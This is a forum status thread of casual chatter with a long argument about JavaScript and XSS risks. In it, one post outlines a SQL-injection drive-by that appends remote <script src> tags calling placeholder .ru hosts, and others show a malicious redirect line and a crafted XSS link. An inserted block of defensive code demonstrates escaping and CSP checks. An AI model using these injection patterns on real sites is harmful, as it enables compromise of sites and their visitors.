The Official Status Thread


  • Notification Spam Recipient

    @MathNerdCNU said:

    fucking shop.

    :giggity:


  • Discourse touched me in a no-no place

    @Polygeekery said:

    That sort of thing would get you SWAT'd these days. And then thrown in jail.

    Why? It's just an old Taurus 9mm--on a table, mind--with a piece of paper with two words written on it. Someone didn't believe me when I said I had bought a gun.


  • :belt_onion:

    @FrostCat said:

    table

    Is it a wooden table?


  • ♿ (Parody)

    Sounds French.


  • ♿ (Parody)

    @blakeyrat said:

    I mean, I knew Boomzilla's the King of all Republicans, but I think he's more the sitting on the estate porch in Georgia sipping $400 sherry type of Republican than the "hey Bill, hold my beer and watch me kick this cow" type of Republican.

    I'll be honest. I prefer to kick people. Also better to just chug the beer than to trust Bill.



  • Status: Thrifty Food, Day One

    • Breakfast: blueberry muffin & coffee provided by work snack rack
    • Lunch: roast beef sandwich and pre-packaged salad
    • Dinner: seasoned pork chop, side of baked potato, dessert of heirloom orange

    Tomorrow is a work lunch, so I get to "cheat" a bit.



  • @blakeyrat said:

    dessert of heirloom orange

    I don't think I'd want to eat an orange that's old enough to have been passed down through multiple generations. 🚎



  • Brothel laws generally don't cover men. Wait are we talking about cars or man-per-square-footage?


  • :belt_onion:

    STATUS:

    Reinstalled nvidia drivers for my GTX 970.

    I didn't have to reboot afterwards.

    I'm in shock! Such a strange thing has never been heard of before!



  • Good, give them to me. They're tasty as shit.



Really? Even incompetent NVidia has been managing that for about 3-4 years now. (They SHOULD have had it working about 4 months after Vista came out.)


  • :belt_onion:

    Eh, must've forgotten it after my last install. It was a while ago. It's annoying how few driver developers are actually competent enough to do that though.


  • Trolleybus Mechanic

    @ben_lubar said:

    a thing that can be done with HTML5 and zero javascript

    HTML5 is shit and should be destroyed with fire.

    @ben_lubar said:

    a thing that JavaScript cannot do in a sandboxed browser

    Unless exploited.

    @ben_lubar said:

    a thing that my browser explicitly gives me a way to stop a site from doing once it attempts to open more than one alert

    A thing that my browser explicitly needs permission to start?



  • @Lorne_Kates said:

    A thing that my browser explicitly needs permission to start?


  • Trolleybus Mechanic

    @sloosecannon said:

    Meanwhile, you're actively fighting something that's actually useful

    I let it be useful when it needs to be.

    @sloosecannon said:

    beneficial 99% of the time

Now I know you're trollidioting with that stat.

    @sloosecannon said:

    because you're afraid that ohnoez teh javascriptz will infect teh computerz!

    Guess what javascript likes to do:

    • read cookies (including auth cookies)
    • break out of the sandbox
    • spy on your form submissions
    • POST data to third party servers
    • log mouse movement and keystrokes
    • click jack
    • redirect
    • present adware
    • run Discourse

    Not to mention pull in third party scripts. Like embeds. For Flash. Which is one of the buggiest, back-dooriest, sandbox-breaking piece of shit imaginable.

Javascript is fine. Third-party, unknown and untrusted sources aren't.

    That is worth actively fighting. Though even that is wrong. I'm not fighting it. I'm passively rejecting it, until it proves itself to me.

    👶 but lorne how du u know javascript is teh evils and 🍼

    Shhh. Here, the grownups will talk a bit more.

    Let's say you go to a website. Let's call it KoalaSpleens.com. It's where you order all your gourmet Koala spleens. You've been there. You've even let it run Javascript.

    But oh no, what's this! You happen to glance down at your NoScript and see a red S. There are still some untrusted scripts running there. Well, who is trying to pull in Javascript?

    A quick check shows that http://sidfhausd.ru is trying to run uueywuUU.js. Oh fuck, son, KoalaSpleens got hit with a hack, and someone dropped some sweet xss all over the place. Good thing you had that NoScript running. Otherwise some random Russian hacker would be running code on your machine right now.

    Oh. Wait. Javascript is useful 99% of the time. I forgot. (that's sarcasm)


  • Trolleybus Mechanic

    @ben_lubar said:

    @Lorne_Kates said:
    A thing that my browser explicitly needs permission to start?

    Your browser needs to show you an alert to show you an alert?

    That's dumb.


  • :belt_onion:

    @Lorne_Kates said:

    read cookies (including auth cookies)

    Not a problem, if the cookies are configured correctly. If they aren't, you have a bigger problem

    @Lorne_Kates said:

    break out of the sandbox

    Doesn't happen often, gets patched almost immediately.

    @Lorne_Kates said:

    spy on your form submissions

    If you visit malicious sites, sure.

    @Lorne_Kates said:

    POST data to third party servers

    If you visit malicious sites, sure.

    @Lorne_Kates said:

    click jack

    If abused, sure.

    @Lorne_Kates said:

    redirect

    HTTP/1.1 302 Found
    Location: http://www.nastysite.com/viruses.exe
    

    @Lorne_Kates said:

    present adware

    http://guides.uufix.com/wp-content/uploads/2015/12/downloadbut-flashing-side-arrow-animation.gif

    @Lorne_Kates said:

    run Discourse

    Well, eh, umm...

    OK, yeah, that's a fair point.

    @Lorne_Kates said:

    Not to mention pull in third party scripts. Like embeds. For Flash. Which is one of the buggiest, back-dooriest, sandbox-breaking piece of shit imaginable.

    Yeah, but if you're sane, you'll keep those off. Because they are exploited all the freaking time. It's like Adobe doesn't even care. Plus Java and Flash (presumably what you're talking about) are much more powerful and can access much more on the system than JS can. JS is restricted (unless exploits happen) to a very small set of things it can do. Most of which only affect the one tab it's running in, and never persist outside a browser session

    @Lorne_Kates said:

    Let's say you go to a website. Let's call it KoalaSpleens.com. It's where you order all your gourmet Koala spleens. You've been there. You've even let it run Javascript.

    But oh no, what's this! You happen to glance down at your NoScript and see a red S. There are still some untrusted scripts running there. Well, who is trying to pull in Javascript?

    A quick check shows that http://sidfhausd.ru is trying to run uueywuUU.js. Oh fuck, son, KoalaSpleens got hit with a hack, and someone dropped some sweet xss all over the place. Good thing you had that NoScript running. Otherwise some random Russian hacker would be running code on your machine right now.

    The problem with your example there is that if you can XSS <script src="http://jfgoiejaija.ru/hack.js" /> into the site, you can almost certainly XSS <script> //JS haxxzzz go here </script> into the site. Which means, instead of running third party js, you're running code that comes from the "safe" site.



  • I'm puzzled as to how you think a site that's been compromised would need JavaScript to steal your credit card numbers that you entered into a form on that site.


  • Trolleybus Mechanic

    @sloosecannon said:

    configured correctly

    I'll get right on trusting sites to do that.

    @sloosecannon said:

    Doesn't happen often

    I'll get right on trusting sites to not let that happen often.

    @sloosecannon said:

    If you visit malicious sites, sure.

    XSS

    @sloosecannon said:

    If you visit malicious sites, sure.

    XSS

    @sloosecannon said:

    If abused, sure.

    XSS

    @sloosecannon said:

    HTTP/1.1 302 Found
    Location: http://www.nastysite.com/viruses.exe

HTTP headers are served by the first-party web server.

    (And I also have RequestPolicy, which halts redirects to non-whitelisted sites unless I click "OK")

    @sloosecannon said:

    ((Download image))

    Yes, and I'm careful about software I download, too.

    @sloosecannon said:

    you'll keep those off

    I have Java uninstalled. Flash is on click-to-play, so I can start a GooTube video if I want, and fuck the rest. Defense in depth.

    @sloosecannon said:

    can access much more on the system

I know. That's why XSS tends to download a script that loads a Flash object that exploits Adobe's Flash Fuck.

    @sloosecannon said:

    JS is restricted (unless exploits happen)

I'll get right on trusting that "unless".

    @sloosecannon said:

    The problem with your example there is that if you can XSS <script src="http://jfgoiejaija.ru/hack.js" /> into the site, you can almost certainly XSS <script> //JS haxxzzz go here </script> into the site. Which means, instead of running third party js, you're running code that comes from the "safe" site.

    Except that's not what happens in drive-by bots. Here's the anatomy of a drive-by, assuming it isn't just a simple "we forgot to sanitize our comment form" attack:

    • Bot tests all input forms for SQL injection
    • If one hits, it injects "declare @a nvarchar(2000); @a=BASE64ENCODED_COMMAND; exec(@a)"
    • @a ends up being "For each (n)varchar field in database, update every record to be RECORD + <script src='sdkf.ru/sdfjs.js' />"
    • The short script injection maximizes the chances of underflowing the nvarchar field
    • The random .js name also helps evade IDS
    • It also allows the hacker to modify sdfjs.js on the fly to correct anything post-go live
    • The hope is that ONE of those fields will be a public-facing, non-sanitized HTML output
    • Unsuspecting user comes around to otherwise safe page, and downloads and runs sdfjs.js, which can contain an unlimited amount of attack code

  • Trolleybus Mechanic

    @ben_lubar said:

    I'm puzzled as to how you think a site that's been compromised would need JavaScript to steal your credit card numbers that you entered into a form on that site.

    See above about third party script injection.

    Am-- am I the only one here who understands the difference between first and third party, and what an xss is?
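The three points argued back and forth above (sloosecannon's "if the cookies are configured correctly", Lorne's first-party vs third-party script distinction, and the "non-sanitized HTML output" step of the drive-by anatomy) each have a defender-side counterpart. The following is an added example written for this page, not code from the thread or from any poster in it; it runs under Node.js with no dependencies. The site name koalaspleens.example, the sample record, the policy string and the function names are all constructed for the example, and the CSP matcher is a deliberate simplification of the real Content-Security-Policy rules (it handles only 'self', 'none', '*' and plain host sources):

```javascript
// Added example, not code from this thread or any poster in it.
// Defender-side counterparts to the points argued above:
//   (a) output-encode database fields so an injected <script src=...>
//       renders as inert text (the "non-sanitized HTML output" step),
//   (b) a Content-Security-Policy that lets the browser refuse scripts
//       from any origin other than the first party,
//   (c) a session cookie flagged HttpOnly so page script cannot read it
//       (cookies "configured correctly").
// Runs under Node.js with no dependencies. koalaspleens.example, the
// sample record and the policy string are constructed for the example.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// (a) HTML-escape a value destined for an HTML text node or attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Render a product page treating every stored field as untrusted.
function renderProduct(record) {
  return `<h1>${escapeHtml(record.name)}</h1>\n<p>${escapeHtml(record.description)}</p>`;
}

// (b) Minimal CSP evaluation: parse "directive source source; ..." and
// decide whether a script URL is permitted. Simplified model only:
// 'self', 'none', '*' and plain host-sources of script-src / default-src.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name] = sources;
  }
  return directives;
}

function scriptAllowed(cspHeader, pageOrigin, scriptUrl) {
  const policy = parseCsp(cspHeader);
  const sources = policy['script-src'] || policy['default-src'] || [];
  const url = new URL(scriptUrl);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return url.origin === pageOrigin;
    try {
      return url.origin === new URL(src).origin; // scheme://host[:port] source
    } catch {
      return url.host === src;                   // bare host-source
    }
  });
}

// (c) Session cookie with the attributes that keep it out of document.cookie
// and off plaintext connections.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// True when page script (and therefore an XSS payload) could read the cookie.
function cookieReadableByScript(setCookieHeader) {
  return !/;\s*HttpOnly\s*(;|$)/i.test(setCookieHeader);
}

// Constructed sample: a record after the kind of mass-update the thread
// describes, with a script tag appended to a text column.
const TAMPERED_RECORD = {
  name: 'Heirloom Koala Spleen',
  description: "Free range.<script src='http://sidfhausd.ru/uueywuUU.js'></script>",
};
const PAGE_ORIGIN = 'https://koalaspleens.example';
const CSP = "default-src 'none'; script-src 'self'; style-src 'self'";

// Runs the three checks against the constructed sample and reports the outcome.
function demo() {
  const html = renderProduct(TAMPERED_RECORD);
  return {
    html,
    scriptTagNeutralised: !html.includes('<script'),
    thirdPartyBlocked: !scriptAllowed(CSP, PAGE_ORIGIN, 'http://sidfhausd.ru/uueywuUU.js'),
    firstPartyAllowed: scriptAllowed(CSP, PAGE_ORIGIN, `${PAGE_ORIGIN}/app.js`),
    cookieHidden: !cookieReadableByScript(sessionCookie('session', 'abc123')),
  };
}

console.log(demo());
```

The layering is the point: escaping stops the tampered record from becoming markup at all, the CSP is the backstop for the one template someone forgot to escape, and HttpOnly limits what an injected script can take even when both of the others fail.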



  • I'm puzzled as to how a website that doesn't have user-supplied content could have an XSS exploit. Are you clicking on links to koala%20spleen_search--fixed2.php?q=%3Cscript%3Edebugger%3C%2Fscript%3C and then opening your debugger and pasting in the code they said to paste in?


  • Trolleybus Mechanic

    @ben_lubar said:

    I'm puzzled as to how a website that doesn't have user-supplied content could have an XSS exploit

    1. It could be a crafted link, as you mentioned
    2. Maybe KoalaSpleens.com has a comments section programmed by Ranger Jimbo's nephew.
    3. See above re: anatomy of site poisoning
    4. Ad networks


  • Status: Watching Colbert. Commercial break!

    • funny jokes about how Donald Trump is trying to escape the presidential race by saying increasingly stupid things

    1. cell phone service provider X is better than cell phone service provider Y
    2. TV SHOW ABOUT MURDER
    3. TV SHOW ABOUT MURDER OF DOCTORS
    4. buy our mattresses
    5. if you were hurt or killed in a car accident, get a lawyer

    • Here's Donald Rumsfeld. He made an app that is a card game.

    Status: why the fuck with the murder horror shows


  • :belt_onion:

    @Lorne_Kates said:

    I'll get right on trusting sites to do that.

    Again... If they're doing cookies that wrong, a XSS js exploit that steals your cookies is the least of your worries.

    @Lorne_Kates said:

    I'll get right on trusting sites to not let that happen often.

    I don't know why you're trusting sites, I'd trust the browser vendors to prevent that and patch it quickly.
    Personally.

    But I guess that's just me.

    @Lorne_Kates said:

    XSS

    Yeah, XSS can do this. But considering I never enter PII into websites ever (no, my email isn't PII), if they steal my form information, oh well. And that's not even remotely likely to happen, because the sites I visit regularly are restricted to, probably like 5 domains.

    @Lorne_Kates said:

    HTTP headers are server by first part web server.

    OK. Still does the same thing as the malicious js...

    @Lorne_Kates said:

    (And I also have RequestPolicy, which halts redirects to non-whitelisted sites unless I click "OK")

    That's gotta be annoying.

    @Lorne_Kates said:

    Yes, and I'm careful about software I download, too.

That was an example of adware. I just presented it. I used no Javascript to present it.

    @Lorne_Kates said:

    I have Java uninstalled. Flash is on click-to-play, so I can start a GooTube video if I want, and fuck the rest. Defense in depth.

    As do I

    @Lorne_Kates said:

    I know. That's why XSS tend to download a script that loads a Flash object that exploits Adobe's Flash Fuck.

    Or....... just use HTML to load a Flash object that exploits Adobe's Flash Fuck? No need to use js there...

    @Lorne_Kates said:

    I'll get right on trust that "unless".

    A quick google search found no instances of js sandbox escape vulnerabilities.
    Found one. From 2009. Top result. https://blog.mozilla.org/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/

    I do seem to recall hearing about another one, a while back, but I can't remember it.
    Regardless, they are extremely rare and are generally patched immediately (because browser vendors patch things like that very quickly).

    @Lorne_Kates said:

    Except that's not what happens in drive-by bots. Here's the anatomy of a drive-by, assuming it isn't just a simple "we forgot to sanitize our comment form" attack:

    How is that relevant to the discussion? A SQL-injection vuln on the server-side doesn't really have any impact on Javascript's security on the client........



  • @blakeyrat said:

    give them to me.

I find they're generally dried out and/or moldy. I don't want them, so you're welcome to them.

    @blakeyrat said:

    They're tasty as shit.

    Um, ok, if you really like that sort of thing, I guess. I won't judge (out loud, anyway), but I'm definitely not into that.


  • Winner of the 2016 Presidential Election Banned

    @sloosecannon said:

    HTML/CSS teacher just explained that moving the mouse around on the computer slows down the FTP upload (of a... like, 10 meg site) because the computer has to process more things and will get slowed down

    It would, technically, be slowed down. Whether or not it is slowed down by any perceptible length of time, however, is another matter.


  • :belt_onion:

    Well actually I don't think it even would be in a multicore environment.

    But yeah, technicality granted.

    Not good enough for a :pendant: though :)



  • Please, tell me more about your newfangled "computer that needs to do network IO to move the cursor".



  • two things:

    1. FTP isn't going to max out your CPU. In fact, it'll barely be using your CPU at all apart from reading files and shoving them across the network.
    2. If your computer needs more than the remaining 99.9% of its CPU time to render the mouse cursor moving across the screen, you may want to consider getting a new operating system.
    3. Your computer would be slowed down a lot more by going into sleep mode and shutting down its network drivers in order to save power. 0 bits per second is pretty slow.
    4. I lied about the number of things.


  • @Fox said:

    It would, technically, be slowed down.

    If the process were CPU-bound, perhaps. In this case, however, the network bandwidth is going to be the limiting factor. Also, even if the process were indeed CPU-bound, unless the process is fully utilizing all the cores, the mouse interrupts could be serviced by another core without disturbing the upload process.


  • Winner of the 2016 Presidential Election Banned

    @ben_lubar said:

    Please, tell me more about your newfangled "computer that needs to do network IO to move the cursor".

    How about I tell you more about my old "computer that uses at least some processing time to do every single action"

    But, yeah, I do believe that multicore would result in essentially zero effect on the FTP upload from moving the mouse. BUT NOT EVERYONE HAS MORE THAN ONE CORE!

Okay, if you have a website and you're having it hosted somewhere, you're ~~probably~~ hopefully not developing on a single core device.


  • Notification Spam Recipient

    @ben_lubar said:

"computer that needs to do network IO to move the cursor".

    Every single one of my VMs, because I connect to them over VNC.

    Oh yeah, 🎣


  • Winner of the 2016 Presidential Election Banned

    @HardwareGeek said:

    If the process were CPU-bound, perhaps. In this case, however, the network bandwidth is going to be the limiting factor.

    Also a good point.



  • Would anyone like a Free Unix Computing Kit?

    Nevermind, I don't have any to give.


  • Notification Spam Recipient

    @LB_ said:

    I don't have any to give.

Well, darn. I had my hand raised and everything!



  • Computer Refurbishment And Protection



  • @Fox said:

    How about I tell you more about my old "computer that uses at least some processing time to do every single action"

    Unless you're maxing out the core your process is running on, your computer isn't going to be slowed down by other processes sharing it. Or do you think that adding two cars to a three-lane road with one car on it causes congestion?



  • @HardwareGeek said:

    @sloosecannon said:
    computer has to process more things and will get slowed down

    To be fair, that might have been true in the past, like 1985 or something.

I recall hearing about Windows XP that shaking the mouse in an application actually made it run faster, since its priority got elevated because of user interaction... Never had a reason to try it though, since I was using an UltraSPARC 5 and an Indigo2 at the time.


  • :belt_onion:

    I'm well aware what he said was a wtf. That's why I posted it here :)


  • Winner of the 2016 Presidential Election Banned

    @ben_lubar said:

    Or do you think that adding two cars to a three-lane road with one car on it causes congestion?

    It seems like it should present no problem, but that exact situation can and often will result in slower movement, at least with the genius drivers around here.



  • Please, tell me more about this computer that is already redrawing the screen at 60+ times a second while polling for changes to things (yay int 33h) and would be doing the work either way.


  • Notification Spam Recipient

    @Lorne_Kates said:

KoalaSpleens.com

    I'm a little disappointed that isn't a real site =(

    STATUS Finishing early today! Doctor wants to talk to me about my arse. =(


  • Discourse touched me in a no-no place

    @Fox said:

    BUT NOT EVERYONE HAS MORE THAN ONE CORE!

    Those people need to get out of the time pod.


  • BINNED

    @DogsB said:

    Doctor wants to talk to me about my arse

    Your own damn fault for continuing to force objects in through the exit


  • Notification Spam Recipient

    @Luhmann said:

    @DogsB said:
    Doctor wants to talk to me about my arse

    Your own damn fault for continuing to force objects in through the exit

    MY POCKETS ARE FULL! WHERE WILL I STORE MY PHONE?



  • @DogsB said:

    Doctor wants to talk to me about my arse.

    "So, Mr. DogsB... that arse of yours..."
    "Yes, Doctor?"
    "Just wanted to say... daaamn. Those buns, man. You're making your momma proud."
    "Uh, okay... *backs away slowly*"


    Filed under: "also, you have ass cancer."


  • Notification Spam Recipient

    STATUS Bewildered!

    Someone in the office is wearing the same shirt as I am. Thank god I'm leaving early so that I can go home and change.



  • @DogsB said:

    Someone in the office is wearing the same shirt as I am. Thank god I'm leaving early so that I can go home and change.

    What's so bad about that?


  • FoxDev

    @DogsB said:

    Someone in the office is wearing the same shirt as I am.

    Must be a big shirt if two of you can fit in it ;)


  • Discourse touched me in a no-no place

    @DogsB said:

    Someone in the office is wearing the same shirt as I am. Thank god I'm leaving early so that I can go home and change.

    You seem to care too much about what people in the office think about what you wear.

